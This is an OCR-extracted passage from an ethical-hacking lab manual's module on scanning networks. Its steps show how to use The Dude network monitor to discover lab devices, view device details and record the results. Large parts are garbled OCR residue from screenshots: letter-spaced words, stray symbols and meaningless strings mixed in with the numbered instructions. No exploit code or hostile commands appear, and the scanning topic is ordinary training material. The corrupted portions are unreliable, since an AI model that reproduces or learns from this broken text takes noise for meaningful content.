O n c e t h e s c a n is c o m p l e t e , a ll t h e d e v ic e s c o n n e c t e d t o a p a r t i c u l a r n e t w o r k w i l l b e d is p la y e d .

C E H Lab M anual Page 261

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

adrmn@localhost

The Dude 4.0beta3

‫־‬f t ^ t
^2 0 9 m :[ 1 0

1 1 dL o c d • f a t S a n h f la !_ 1 1■ s +-_ Ccrtemt____________ f~l *ricteo Lata A d n n s4 . » QF u 1 d io n
B «*< 2 □ ‫ ק‬Chats Oevteaa □ ‫*׳‬- * Pie

C : _e [o * | S e c p y I |D h c o v e f |^ T o o ia tt 1 a s ‫י‬- |l‫־‬ k s

Q y

.t
WIN.D39MR5HLSE-:


AOMN

WW*IXY858KH04P (DU I 9 N tn c n t 63 % vM: 27% disk 75%

» e t1 0 n *0 7 *40 H1 -‫׳*י״‬ □ ‫י‬-00« £ 7^ 6 • ‫י‬
L f Uofcoa L?rv«n1

r M flM M tttL C X U U l

\
* ‫י‬
w in ? U 't '. ic . '. - t f s

I
N .
\

‫י‬
‫ו‬

□ to b> 1 0 « m
d n ‫ *ס״״^־ז‬Map* Q Local ‫ ק‬r ‫־‬fcnwortc»

asy*B

‫ ב רז‬- ‫^ נ‬

‫א‬

Q NotActfont
H□ PjTriS

Q adrrin 1 2 7 .0 ,0 .1
Q P t 638 5> Sennco Q Tcde

V I1 h K .K 0 H )1 m 3 ^ M

Qm - ‫׳‬x 3 2 5 ■ ‫ ׳‬oc« ‫ ׳‬w I 95 bpj

Saver r 1 ( ( 4 (> > * 3 9 t®c«

F IG U R E

1 8 .8 : O v e r v i e w o f n e t w o r k c o n n e c t i o n

8.

Select a device and place d ie mouse cursor o n i t to display the detailed in fo rm a tio n about d ia t device.

C artvM 5 Ad<*«3a Lota A Admr* R Afl*rta

♦ •‫ ״‬%

jo ^ S t f t t K u j o D w o v w

~ * 1Z o o m .[ T O

□C h a t *

Q0 8 V 1 0 0 8
^ Plea Q Functions □ Lnk* ‫ □ ־‬Lcoa ]J? Acton

t f t t e O T . JLYKSO-Ci P IP• 100 0 9

W rd c v n a x n p u c r‘,
V irc 0*5 I t o i a i 6 & End

M A CC tt ■- 1 0

□H a t o v V * • * ®
C7 Detua
£? Ewr L7S«bg Mb Mod*® rielwork Maps B local n NHwwk•

S jc rT !‫ז‬.‫*־״‬.v w .’ .‫׳‬ Y 3 5 a m 3 ip C esacto- -fc*».=«e ntes« Famly G Wsdd 42 9eppng 7 M /M COUPATBU 6 0 0 1 WipxnsrFix)
Ipwue 0028‫־‬ <J771

S*'42 m (7V U > i 1 Q r«0 0 a 1C2 coj fn&nory vrtuai memoiy. cfck

B

2 N 9U lc4B0r•
Q Parris

H•*™ 1 2 7 . 0 0 . 1 □P ‫׳‬c N »
Q> Samcas H Tocte

J?* I !_•« a M■ «L'

I? •#

1 ‫ג‬4 <

‫«נו‬

iwttdai e UU liriM M O ll-

) > « • n n ■ • • :‫ י‬u U C M K JP

12:3 I ecu • lam 0 «■ a.'iaaeoip

u :a

12:40

12: X

1*•:
■ .W * ‫־‬ . n m ‫־‬,

| mdiv 0 vnn-uiYKBocnP

t

1 3 :ta
«W -ll‫־‬ r8!a.H0TP

C V t m 2 4 5 Upa/tx 197bpa

n .1 5 4 ttp a /fc 3 3 k b c «

F IG U R E

1 8 .9 : D e t a i l e d i n f o r m a t i o n o f t h e d e v i c e

9.

N o w , c lic k the d o w n a rro w fo r die L o ca l d ro p -d o w n lis t to see in fo rm a tio n o n H is to ry A c tio n s , T o o ls, F iles. Logs, and so on.

C E H Lab M anual Page 262

E th ic a l H ackin g and Counterm easures Copyright © by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

F IG U R E

1 8 .1 0 : S e le c tin g L o c a l i n f o r m a t i o n

10. Select o p tio n s fro m d ie d ro p -d o w n lis t to v ie w com plete in fo rm a tio n .
adm!r1@iocalha5t ‫ ־‬The Dude 4.0beta3 ® | | Preferences | f r Local Swar Heb

‫ ־ < _ ־‬X ‫־‬,

• O

S e t B n g j
C o‫׳‬not?
Q Add's** Lilt(
4 ‫יי‬4 ‫י‬1‫! ו‬ Q *s»t‫״‬U

e • I~ , M

S

«

□O w l•
r*1 LVvn.•* ‫ *׳‬Fto* Q I undior• M U K» ‫ □ >־‬Logs

□ IM a y/ t o w n s £ 7A = < 1 0 n
£? Debug
£ 7 E v « rf

2u 3u au 5U cu
7U

‫ ו‬u

£? Stfog ‫ ם‬Mb Me**

9u 10 u ‫ וו‬u 12 u 1 3U 14 U 1 5U
•6 U 16 U

fi U

7‫ ו‬u

20 u

1 9U

A d e n NttwOlk Map Be‫׳‬nrfl dn1£1‫*׳‬d e ‫׳‬n » n tc h a n je d 1 3 0 2 4 CNer*e«k Map B 13024S fJrtocik Map btmrU 1 l»a•‫׳‬ 1 ‫־‬ ‫׳‬r* «c h a n g e d 1 3 0 ;4 9Netv«ak Map B lv w 'i:Jw j* 0 1302S0 fM o w k Map b f« w m c h a n g e d ttitc ik Map B 1 3 0 ?5 ?H » w 1 !( .1 1 • ‫׳‬j« 0 130254 fM o cik Map H e m e m c h a n g e d (3 0 2K Merwak Map B 130258 fjnC*«k Map b c w : changtd fm c ik Map Bemem changed 1 3 0 3 4 0tk 130302 NttWClk Map Be lt# ills' jeO 1 3 0 3 0 3lJer«e(k Map Berotm changed 13.03.06 r«(.«c«k Map 0 c1‫*׳‬s‫׳‬r. da'jed 1 3 0 3 4 8liefMCik Map Beroen: changed . cha'Sed 13.03.14 ta t« a k Map Bc1*‫׳‬T 1 3 0 31 6tieCMdk Map B fw t changed w n e rtc h a n o e d 13.03.20 Netwak Map B 1 3 0 3 2 2I jefMCik Map Berne'S changed w m n lc h rxl 130324 heCaak Map B 1 3 0 3 2 7Net‫*־‬c«k Map Beroen! changed
130245

Crr«<t«J

0 *rt «9 17kbpa/|x 1 I2kbp«

S«nv‫ ־‬a 3?4Ktv* ■» H ?*ten

a d ^ n ^ io c a lh o s t - The Dude 4,Obela3 ® fafaenoee O toca s«n

‫־‬

a

*

oI

G r t B f g j
Conterts
3 Address Usts £ AcJ-rriS Q Ao-nls

L ‘

* ‫־‬
i

‫׳*״‬ L ^ v:c 100a! 1 0 0 0 . 1 2 1 0 0 0 2 5 5 A D V f , V / V 2 H 9 S T O S G W t t O U M R S H L WHCSCI• S G 1 W IUJO0M I w !H « 5 s r .c 1 u
W K M W S8 l l l

ih ti^ rS S B S S X S A l
_ ..L J U

Type, (*

3

M * f‫^ ־ ־‬i

T]

□ ‫י‬

g o w n s

U i Z . r 't nT‫׳‬,c«‫>־‬
j«-=le incte iincte M-rle

Q Devicw 5!‫ ׳‬Fte» Q Functor•

M T C f c

Q Ktolciy Actons
‫ם‬ ‫ ־‬1‫ס‬ Lrk»

C7 Aden

1‫יה״‬

r7 E v « 4 Lfb S ^ o fl CJ M r * d » .

CfO e b u o

W C t e w‫•*־־‬ tn c b
u-de vmo M‫* |״‬ *mcl*

w *C 0 w »

Mao Local Local Local Local Local Local Local Local Local Local Local Local

Cflrr ‫׳‬x 2 91 kbpa/ tx276bf>t

S f ln 0 ‫־‬ 9‫־׳‬t 2 l6 -‫׳‬rp * ■* ‫ ל‬2‫ ׳ל‬4 ‫» ן‬ ?

F IG U R E

1 8 .1 1 : S c a n n e d n e t w o r k c o m p le t e i n f o r m a t io n

C E H Lab M anual Page 263

E th ic a l H ackin g and Counterm easures Copyright C by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

11. A s described previously, you m ay select all die o th e r o p tio n s fro m the d ro p -d o w n lis t to v ie w d ie respective in fo rm a tio n . 12. O nce scanning is com plete, c lic k the b u tto n to disconnect.

a d m in © lo c a lh o s t - Th e D u d e 4.0beta3
Fwfcwnooa 9 Local Sorvor *•to

• ‫ל‬

jC tn a s d G'
RA d d r e s sU 8 I8
£ AdnlrM
□ Agert«


+ ‫״‬

r

C. O

k

S*crgc

O noowf

‫ ״‬Too*

M

\

•*.‫״‬

L* ,*

[irk T

□ Chate

t<
W ik U L Y S S B K H Q IP tpu 2 2 % IM fT t S 0 % v.it 3 4 % disk 7 5 %

,1
W IN-D39NRSH1.91= 4

‫י‬
ADMIN

□ G e v c e s

QH is to r y A c tio n s HL in lc s =3 L e g *

r* = 1 « nF _ ra c n 8

C ‫־‬ fActon
Even!

‫י‬
_ WIN-2N95T0SGIEM

v
\

‫י‬
1000

(ZJ D c b u o
O

r

Q IS e tw o ifcM ip s

S/*log M to Nodoo

< |

B - l gcjj

1 ■

j [>

‫ ־‬r ‫ ־ \־ ^־־‬T ^ ‫־ ר ^ ל ^ ה־ רז‬ .1
WM-LXQ\3\VR3!WM

n Z

W k b w ' b 135 bps

5<?vrr r t

i.

1 2 c p 5 't * 3 •15 *bps

FIGURE 1 8 .1 2 :Connectionof system sin network

L a b A n a ly s is
Analyze and docum ent die results related to die lab exercise. T o o l/U tility In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d IP A d d re s s R a n g e : 10.0.0.0 — 10.0.0.24 D e v ic e N a m e P re fe re n ce s: D N S , S N M P , The D ude N E T B IO S , IP O u tp u t: L is t o f connected system, devices in N e tw o rk

C E H Lab M anual Page 264

E th ic a l H ackin g and Counterm easures Copyright O by E C ‫־‬Counc11 A ll Rights Reserved. Reproduction is Strictly Prohibited

M o d u le 0 3 - S c a n n in g N e tw o rk s

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

In te r n e t C o n n e c tio n R e q u ire d □ Y es P la tfo r m S u p p o rte d 0 C la s s ro o m 0 iLabs 0 No

C E H Lab M anual Page 265

E th ic a l H ackin g and Counterm easures Copyright © by EC-Council A ll Rights Reserved. Reproduction is Strictly Prohibited.